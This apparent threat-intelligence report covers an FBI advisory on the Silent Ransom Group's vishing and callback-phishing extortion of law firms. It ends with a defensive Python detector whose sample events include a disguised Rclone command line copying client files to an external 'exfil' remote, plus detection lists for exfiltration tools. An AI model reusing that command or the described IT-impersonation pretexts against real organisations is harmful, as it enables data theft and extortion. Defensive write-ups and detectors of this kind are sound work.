Full Report
The FBI is warning that a threat group is using IT-themed social engineering calls and callback phishing emails to gain remote access to systems and steal sensitive data. The Silent Ransom Group (SRG), also known as Luna Moth, Chatty Spider, and UNC3753, then uses the stolen data to extort the law firms, the advisory from the FBI’s Cyber Division said.

Silent Ransom Group Finds a Niche Targeting Law Firms

While SRG has historically targeted other sectors such as medical and insurance organizations, beginning in spring 2023 the group has consistently targeted U.S.-based law firms and organizations with “similar naming conventions,” the FBI said, “likely due to the highly sensitive nature of legal industry data.”

The group has been operating since 2022 and is primarily known for callback phishing emails, also called reverse vishing, in which the group impersonates well-known companies and claims to be charging small subscription fees. If the victim wishes to cancel the fake subscription, they must call the threat actor, who emails the victim a link to download remote access software that gives the actor access to their device or system. Once access is established, the group searches for sensitive data to exfiltrate and then sends a ransom notice threatening to release the data if the ransom is not paid.

Beginning in March 2025, the group changed tactics by calling individuals and claiming to be an employee of their organization’s IT department. Such social engineering calls are known as vishing, short for “voice phishing.” The threat actor then tries to get the employee to join a remote access session. If the employee grants access to their device, “they are told that work needs to be done overnight,” the FBI said.

“Once in the victim’s device, a typical SRG attack involves minimal privilege escalation and quickly pivots to data exfiltration conducted through ‘WinSCP’ (Windows Secure Copy) or a hidden or renamed version of ‘Rclone,’” the FBI advisory said.

In the short amount of time SRG has been pursuing the vishing tactic, “it has been highly effective and resulted in multiple compromises,” the FBI said. The group will also call victim organizations to pressure them into ransom negotiations. While SRG has a publicly available site to post victim data, “they are inconsistent in their use of the site, and do not always follow through on posting victim data,” the FBI said.

SRG Attacks Difficult to Detect

Because SRG uses legitimate management and remote access tools, attacks are unlikely to be detected by traditional antivirus tools. Organizations are advised to monitor for the following potential signs of compromise:

- New unauthorized downloads of system management or remote access tools such as Zoho Assist, Syncro, AnyDesk, Splashtop, or Atera
- WinSCP or Rclone connections made to an external IP address
- Emails from an unnamed group claiming data was stolen
- Voicemails or phone calls from an unnamed group claiming data was stolen
- Emails about subscription services that provide a phone number and require a call to remove pending charges
- Employees receiving unsolicited phone calls from individuals claiming to work in their IT department

Recommendations include:

- Conducting staff training on phishing
- Developing and communicating policies for authenticating IT staff with employees
- Implementing two-factor authentication for all employees

The FBI is seeking any information from SRG victims that can be legally shared, such as ransom notes, phone numbers used by the threat actor, communications such as voicemails, cryptocurrency wallet information, and more.
Analysis Summary
# Threat Actor: Silent Ransom Group (SRG)
## Attribution & Identity
The FBI advisory names the actor as the Silent Ransom Group (SRG) and lists the aliases Luna Moth, Chatty Spider, and UNC3753; it offers no attribution beyond those names. SRG is a data-theft extortion group: the advisory describes exfiltration followed by a ransom demand to withhold publication, and mentions no file encryption.
## Activity Summary
The FBI has issued a warning about SRG's current campaign, which primarily targets law firms. The group has operated since 2022 using callback phishing, and since March 2025 has added vishing (voice phishing) calls in which the caller poses as the target's own IT department; in that short time the tactic "has been highly effective and resulted in multiple compromises." After exfiltration the group pressures victims into ransom negotiations, including by telephone, and maintains a publicly available data leak site that it uses inconsistently, not always following through on posting victim data.
## Tactics, Techniques & Procedures
- **Initial Access (Callback Phishing, since 2022):** Emails impersonating well-known companies about a small subscription charge, with a phone number the victim must call to cancel; the operator on the call emails a link to remote access software, which the victim installs.
- **Initial Access (Vishing, since March 2025):** Unsolicited calls in which the actor claims to be from the target's IT department and asks the employee to join a remote access session. An employee who grants access is told that "work needs to be done overnight," a pretext that keeps the session open while unattended.
- **Minimal Privilege Escalation:** Once on the device, SRG performs little privilege escalation and moves directly to collection.
- **Data Exfiltration:** Data is pushed out with WinSCP or with a hidden or renamed copy of Rclone.
- **Use of Legitimate Tools:** Commercial remote access and management tools plus WinSCP and Rclone leave no malware signature for traditional antivirus to match.
- **Extortion:** A ransom notice threatens to release the data; the group also phones the victim organization to pressure it into negotiations, and posts to its leak site only inconsistently.
- [No specific standardized MITRE ATT&CK IDs were provided in the source material.]
## Targeting
- Sectors: Law firms and organizations with "similar naming conventions" (consistent focus since spring 2023); historically also medical and insurance organizations.
- Geography: United States (the advisory refers to U.S.-based law firms).
- Victims: Law firms are the explicitly stated target sector for this specific FBI warning; the stated motive is the highly sensitive nature of legal industry data.
## Tools & Infrastructure
- **Data Exfiltration Tools:** WinSCP, or a hidden or renamed copy of Rclone.
- **Remote Access/Management Tools (installed by the victim at the actor's direction and then used for hands-on access):** Zoho Assist, Syncro, AnyDesk, Splashtop, or Atera.
- **Infrastructure:** A publicly available data leak site, used inconsistently. The advisory names no other infrastructure.
- **Artifacts the FBI is requesting from victims (where legally shareable):**
- Ransom notes.
- Phone numbers used by the threat actor.
- Communications such as voicemails.
- Cryptocurrency wallet information.
## Implications
SRG poses a significant threat because its intrusions begin with a phone call rather than malware and then run on legitimate remote access and file transfer tools, so signature-based antivirus has nothing to match; detection depends on noticing unapproved tools and unusual outbound transfers. The focus on the legal sector points to an interest in privileged client data, and the calls to victim organizations are meant to hurry ransom negotiations.
## Mitigations
- **Monitoring:** Monitor for new, unauthorized downloads or installations of management/remote access tools (Zoho Assist, Syncro, AnyDesk, Splashtop, Atera) and compare them against the organization's approved tooling.
- **Network Monitoring:** Monitor for WinSCP or Rclone connections to external IP addresses. Because the advisory notes that Rclone may be hidden or renamed, do not rely on the file name alone; command-line shape and destination are better signals.
- **Communication Policy:** Develop and actively communicate clear policies for authenticating IT staff, so that employees can verify the identity of anyone claiming to be IT before joining a remote session (for example, by calling back through a known internal number).
- **Staff Training:** Conduct specific staff training focusing on phishing, vishing, and social engineering tactics, especially unsolicited IT support calls and subscription emails that demand a phone call to cancel charges.
- **Authentication:** Implement Multi-Factor Authentication (MFA/2FA) for all employee accounts. Note that SRG's access comes through a remote session the employee opens, which MFA does not block; its value here is in limiting what stolen credentials can reach afterward.
- **Alert Monitoring:** Be vigilant for initial compromise indicators, including emails or calls threatening data leaks and unsolicited calls claiming to be from internal IT teams.
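The two host-level indicators the advisory asks organizations to watch for (unauthorized remote access tools, and WinSCP or Rclone talking to external addresses), together with its note that Rclone may be hidden or renamed, can be turned into a small detection. The Python script below is an added example, not code from the FBI advisory or from any vendor. It runs those checks over Sysmon-style process-creation (Event ID 1) and network-connection (Event ID 3) records, and catches a renamed Rclone by its command-line shape rather than its file name. The RMM keyword list, the rclone flag heuristic, the internal address ranges and every sample event are assumptions constructed for this example.

```python
"""Detect the FBI advisory's two host-level SRG indicators in Sysmon-style events:
launches of remote access / RMM tools, and WinSCP or Rclone (including a renamed
Rclone) connecting to external IP addresses.  Added example; sample events are
constructed, not real telemetry."""
from __future__ import annotations

import ipaddress
import re
from pathlib import PureWindowsPath

# Tool names from the advisory.  Matching keywords against the image path and PE
# version fields is an assumption made for this example; production rules should
# key on each vendor's signed binary names and hashes.
RMM_KEYWORDS = ("zoho assist", "zohoassist", "syncro", "anydesk", "splashtop", "atera")

# Rclone sub-commands and documented rclone flags.  A renamed binary keeps its
# command-line shape, so the heuristic matches on that rather than on the name.
RCLONE_VERBS = {"copy", "copyto", "sync", "move", "moveto", "ls", "lsd"}
RCLONE_FLAGS = {"--config", "--no-check-certificate", "--transfers", "--progress",
                "--ignore-existing", "--auto-confirm", "--multi-thread-streams"}
# An rclone "remote:path" operand; two or more name chars so "C:\..." paths do not match.
REMOTE_RE = re.compile(r"\s[A-Za-z0-9_-]{2,}:[^\s]*")

# Ranges treated as internal (assumption: RFC 1918, loopback, link-local, ULA).
# Extend with the organisation's own public ranges and sanctioned SFTP/cloud endpoints.
INTERNAL_NETS = [ipaddress.ip_network(n) for n in (
    "10.0.0.0/8", "172.16.0.0/12", "192.168.0.0/16", "127.0.0.0/8",
    "169.254.0.0/16", "::1/128", "fc00::/7", "fe80::/10")]


def is_external(ip: str) -> bool:
    """True when ip falls in none of INTERNAL_NETS."""
    addr = ipaddress.ip_address(ip)
    return not any(addr in net for net in INTERNAL_NETS)


def rmm_tool(ev: dict) -> str | None:
    """Return the RMM keyword matched by a process-creation event, else None."""
    fields = ("Image", "OriginalFileName", "Product", "Company", "Description")
    haystack = " ".join(str(ev.get(f, "")) for f in fields).lower()
    return next((kw for kw in RMM_KEYWORDS if kw in haystack), None)


def looks_like_rclone(cmdline: str) -> bool:
    """Heuristic: an rclone verb plus either an rclone flag or a remote operand."""
    args = cmdline.split()[1:]
    has_verb = any(a.lower() in RCLONE_VERBS for a in args)
    has_flag = any(a.split("=", 1)[0].lower() in RCLONE_FLAGS for a in args)
    return has_verb and (has_flag or REMOTE_RE.search(cmdline) is not None)


def detect(events: list[dict]) -> list[tuple[str, str, str]]:
    """Run the rules over events in order; return (rule, image, detail) alerts.
    GUIDs of rclone-like processes are remembered so that later network events
    from a renamed binary are still attributed to Rclone."""
    alerts: list[tuple[str, str, str]] = []
    rclone_guids: set[str] = set()
    for ev in events:
        image = ev.get("Image", "")
        base = PureWindowsPath(image).name.lower()
        guid = ev.get("ProcessGuid")
        if ev["EventID"] == 1:
            kw = rmm_tool(ev)
            if kw:
                alerts.append(("rmm-tool-launch", image, kw))
            cmd = ev.get("CommandLine", "")
            if base == "rclone.exe" or looks_like_rclone(cmd):
                if guid:
                    rclone_guids.add(guid)
                rule = "rclone-exec" if base == "rclone.exe" else "rclone-renamed"
                alerts.append((rule, image, cmd))
        elif ev["EventID"] == 3:
            tool = None
            if base == "winscp.exe":
                tool = "winscp"
            elif base == "rclone.exe" or (guid and guid in rclone_guids):
                tool = "rclone"
            dst = ev["DestinationIp"]
            if tool and is_external(dst):
                alerts.append((f"{tool}-external-connection", image,
                               f"{dst}:{ev.get('DestinationPort')}"))
    return alerts


# Constructed Sysmon-style records (not real telemetry).
SAMPLE_EVENTS = [
    {"EventID": 1, "ProcessGuid": "{A1}", "Image": r"C:\Users\jdoe\Downloads\AnyDesk.exe",
     "OriginalFileName": "AnyDesk.exe", "Product": "AnyDesk", "Company": "AnyDesk Software GmbH",
     "CommandLine": r"C:\Users\jdoe\Downloads\AnyDesk.exe"},
    {"EventID": 1, "ProcessGuid": "{B2}", "Image": r"C:\ProgramData\svchost.exe",
     "OriginalFileName": "-", "Product": "-", "Company": "-",
     "CommandLine": r"svchost.exe copy C:\Shares\Clients mega:exfil --config C:\ProgramData\r.conf --no-check-certificate --transfers 16"},
    {"EventID": 3, "ProcessGuid": "{B2}", "Image": r"C:\ProgramData\svchost.exe",
     "DestinationIp": "203.0.113.45", "DestinationPort": 443},
    {"EventID": 3, "ProcessGuid": "{C3}", "Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "DestinationIp": "10.20.30.40", "DestinationPort": 22},
    {"EventID": 3, "ProcessGuid": "{C3}", "Image": r"C:\Program Files (x86)\WinSCP\WinSCP.exe",
     "DestinationIp": "198.51.100.7", "DestinationPort": 22},
    {"EventID": 1, "ProcessGuid": "{D4}", "Image": r"C:\Windows\System32\notepad.exe",
     "OriginalFileName": "NOTEPAD.EXE", "Product": "Microsoft Windows Operating System",
     "Company": "Microsoft Corporation", "CommandLine": "notepad.exe"},
]

if __name__ == "__main__":
    for rule, image, detail in detect(SAMPLE_EVENTS):
        print(f"{rule:28} {image}  ->  {detail}")
```

Run against the sample stream it raises four alerts: the AnyDesk launch, the renamed Rclone (a binary called svchost.exe with an rclone command line), that process's connection to 203.0.113.45, and WinSCP's connection to 198.51.100.7; the WinSCP session to 10.20.30.40 stays silent because the destination is internal. Before deploying, replace the keyword list with the vendors' signed binary names and hashes, and add the firm's own public ranges and approved SFTP endpoints to the allow list, otherwise a legitimate nightly WinSCP backup to a hosted server will look exactly like exfiltration.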